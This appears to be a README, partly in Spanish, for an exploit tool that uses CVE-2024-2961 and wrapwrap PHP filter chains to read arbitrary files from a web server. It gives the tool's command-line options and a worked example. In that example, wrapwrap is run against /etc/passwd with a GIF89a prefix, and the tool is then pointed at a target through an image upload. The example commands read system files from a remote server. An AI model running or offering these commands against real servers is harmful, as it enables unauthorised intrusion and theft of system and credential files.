
Utiliza CVE-2024-2961 para realizar una lectura arbitraria de archivos
Utiliza CVE-2024-2961 para realizar una lectura arbitraria de archivos
Úsalo con wrapwrap para obtener la máxima potencia.
usage: arbitrary-file-read.py [-h] -t TARGET -c CHAIN -ct CONTENT_TYPE [--prefix-len PREFIX_LEN] [--suffix-len SUFFIX_LEN]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
The target URL (e.g. http://subdomain.vulnerable.tld) - Don't include any URL path component
-c CHAIN, --chain CHAIN
The filepath of the chain file from wrapwrap (see: https://github.com/ambionics/wrapwrap)
-ct CONTENT_TYPE, --content-type CONTENT_TYPE
The content type that your filter chain pretends to use
--prefix-len PREFIX_LEN
The length of the PREFIX to remove from the file in the response. Ex to remove the "GIF89a\n" header use `--prefix-len 8
--suffix-len SUFFIX_LEN
The length of the SUFFIX to remove from the file in the response
Aquí hay un ejemplo de cómo podrías usarlo con una subida de archivos que acepta imágenes GIF:
# ejecuta wrapwrap para obtener el archivo chain.txt que contiene la cadena de filtros PHP
python3 wrapwrap.py /etc/passwd 'GIF89a\n' '' 999
# ejecuta esta herramienta, proporcionando chain.txt como argumento
python3 ./arbitrary-file-read.py -t 'http://vulnerable.tld' -c ./chain.txt -ct 'image/gif' --prefix-len 9